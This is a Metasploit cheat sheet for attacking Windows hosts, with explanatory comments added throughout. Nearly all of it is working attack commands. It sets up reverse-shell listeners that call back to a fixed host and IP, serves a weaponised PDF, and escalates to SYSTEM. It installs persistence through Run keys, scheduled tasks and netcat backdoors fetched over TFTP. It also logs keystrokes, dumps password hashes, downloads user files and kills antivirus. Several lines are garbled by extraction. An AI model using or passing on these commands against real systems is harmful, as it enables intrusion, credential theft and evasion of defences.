
Cheat Sheet of Metasploit

This document provides a cheat sheet of commands for the Metasploit framework. It includes commands for configuring exploits and payloads, executing exploits, gaining persistence on Windows systems, privilege escalation, and removing antivirus software. The document then provides examples of using Metasploit for tasks like port forwarding, keylogging, network scanning, password dumping, and uploading files.


Cheat sheet of Metasploit. The commands are as follows.

# Generic listener for a Windows Meterpreter reverse_tcp callback. Note that the
# handler's LHOST is a DNS name while the persistence script below gets a bare IP;
# the author's later remark ("persistence! broken ...if you use DNS name") is why.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
# Port 21 is reused for every listener/server port in this sheet (see the setg lines
# further down), presumably to blend in with FTP on egress filters.
set LPORT 21
# Keep listening after the first session instead of exiting the handler.
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
# AutoRunScript runs on every new session. Here it installs persistence calling back
# to 75.139.158.51:21 (-A start a matching handler, -X install to start at boot,
# -i 30 reconnect interval in seconds -- per the persistence script's usage; verify
# against the script version in use).
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

# -j runs the handler as a background job, -z does not interact with new sessions.
exploit -j -z

# file_autopwn
# Serves a file-format exploit built from a real PDF. The scratch directory and the
# whole ~/.msf3 profile are wiped first -- destructive: any existing msf database,
# history and configuration are discarded.
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

# Template document. In this extraction the URL was wrapped onto its own line and
# carries a proxy prefix; the original was a single wget command line.
wget -O /tmp/file3.pdf
https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

# sqlite3 backend with a fresh database "pentest11". db_driver/db_create are the
# Metasploit 3.x-era commands and were dropped in later releases.
db_driver sqlite3
db_create pentest11
# setg values are global: they apply to every module loaded afterwards.
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

# Input document that file_autopwn wraps (presumably used as the template).
setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

# Generated files go to the directory created above.
set OUTPATH /tmp/1


# Serve over HTTPS at /msf on SRVPORT; keep serving after a session arrives.
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
# Same persistence autorun as in the handler block.
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

# shows all the scripts
# `run` with no script name -- per the author's note, this lists the available scripts.

run

# persistence! broken …if you use DNS name ..
# Same persistence script as AutoRunScript, invoked by hand with an IP literal.

run persistence -r 75.139.158.51 -p 21 -A -X -i 30

# Presumably harvests stored Pidgin credentials (inferred from the script name).
run get_pidgin_creds

# Host reconnaissance: user idle time and OS details.
idletime
sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )
# 376 is an example PID from the author's own session, not a constant.

migrate 376
shell

# session hijack tokens
# incognito impersonates a token already present on the host; priv/getsystem is the
# direct SYSTEM escalation. The curly quotes (“ ”) throughout this sheet are an
# extraction artifact; the original used ASCII double quotes.

use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”
# escalate to system
use priv
getsystem

# Spawn cmd.exe: -H hidden, -c channelized I/O, -i interact, -t run with the
# currently impersonated token (per meterpreter's execute usage). The second form
# runs visibly, without the token.
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps
# prefetchtool reads the Windows Prefetch folder; -x 20 presumably caps the listing
# at 20 entries.

run prefetchtool -x 20

# list installed apps

run prefetchtool -p

# Interfaces and subnets reachable from the compromised host.
run get_local_subnets

# find and download files
# search_dwld <directory> <pattern>. The second line is missing its closing quote
# in this extraction.

run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office
# alternate
# -r recurses: everything under the directory is copied to the operator's home.
download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM


# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc
# winenum: local enumeration script; per the note above it spawns wmic etc., which
# is noisy in process-creation logs on the host.

run winenum

# rev shell the hard way
# Scheduled-task variant: scheduleme uploads /tmp/nc.exe and registers a task that
# runs it with the -o options (a listening cmd.exe on 8080). -m 1 appears to be the
# run interval in minutes. This leaves both an uploaded binary and a task entry on
# the host -- two easily audited artifacts.

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then
# running it as a backdoor.
# schtasksabuse creates the task remotely on 192.168.1.7; the task pulls nc.exe over
# TFTP from 192.168.1.8 and starts it. Each command is wrapped across two lines in
# this extraction -- the quoted -c argument was a single line. -d 4 is presumably a
# delay value (not documented here).
run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe” -d 4

# vnc / port fwd for linux
# Pushes a VNC server over the existing Meterpreter channel.

run vnc

# priv esc
# kitrap0d: the 2010-era Windows kernel local-privilege-escalation script (long since
# patched); getgui enables Remote Desktop access on the host.
run kitrap0d
run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
# killav attempts to terminate known AV processes; the author flags it as unreliable.

run killav

# Typo in the source: the script is winenum, as used earlier in this sheet.
run winemun

# Dumps process memory back to the operator.
run memdump

# Presumably bypasses the Windows lock screen (inferred from the name).
run screen_unlock

# Drops a binary named after a system directory into system32, registers it under
# the machine Run key, and adds it to the XP-era firewall's authorized-applications
# list. The registry paths below are wrapped across lines in this extraction
# ("aut horizedapplications" is one word). Every one of these writes is a classic
# persistence / firewall-tampering indicator that host monitoring should cover.
upload /tmp/system32.exe C:\\windows\\system32\\


reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion
\\run
# -Ldp 455 -e cmd.exe are netcat options, so the uploaded file is presumably a
# renamed nc.exe set to listen on 455.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v
system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion
\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
# Value name "sys" here but "system32" is queried on the next command -- likely a typo.
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
-v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
-v system32
# Destination path wrapped across two lines in this extraction.
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local
settings\\application data\\microsoft\\”
# Identity, process list, own PID; then the keystroke sniffer (start / dump).
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
# Port forwards through the session (-L local address, -l local port, -r remote
# host, -p remote port). Both lines are damaged in this copy: the first ends in a
# stray ″ and has a malformed -L address, the second has no -l port value.
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

# Native shell, then the author's own file-server script (not a stock script; -h
# prints its usage, -p sets its port).
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

# Bind-style listener via script: default port, then 1975.
run msf_bind
run msf_bind -p 1975
# Drop any impersonated token back to the original user; getuid shows the result.
rev2self
getuid

getuid

# enumdesktops lists the window stations/desktops; grabdesktop presumably switches
# to one of them.
enumdesktops
grabdesktop

# Installs a full Metasploit framework on the target from the given installer.
run deploymsf -f framework-3.3-dev.exe

# Collection and persistence scripts: hashdump reads local account hashes; metsvc
# installs Meterpreter as a Windows service (a persistence artifact a defender can
# enumerate); scraper gathers system information; checkvm detects virtualisation;
# keylogrecorder logs keystrokes.
run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
# netenum DNS/host enumeration: -fl forward lookups from a host list, -rl reverse
# lookups over a range, -st service-record lookup, -ps ping sweep (flag meanings
# inferred from the arguments used here).
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script
# Only -h (usage) is shown; no attempt is made here.

run winbf -h

# upload a script or executable and run it
# Shown without arguments; upload and execute in one script.

uploadexec

# Using Payload As A Backdoor from a shell
# Three native autostart mechanisms from a plain cmd shell, all pointing at the same
# dropped metabkdr.exe: the HKCU Run key, a legacy `at` job and a SYSTEM scheduled
# task. These are exactly the autorun locations a host audit should enumerate.

# "Curre" / "ntVersion" is one path component split by the extraction.
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre


ntVersion\Run /v firewall /t REG_SZ /d
“c:\windows\system32\metabkdr.exe” /f
# at.exe job, weekdays at 19:00.
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
# Scheduled task named FIREWALL running as SYSTEM every 45 minutes until 11/11/2011
# (command wrapped across two lines here).
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL
/TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory
# still … Darkspy, Seem, Icesword GUI can kill the tasks
# catchme.exe against Kaspersky's avp.exe with its -K, -E and -O modes; as the
# author notes, the process stays resident until reboot.
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy
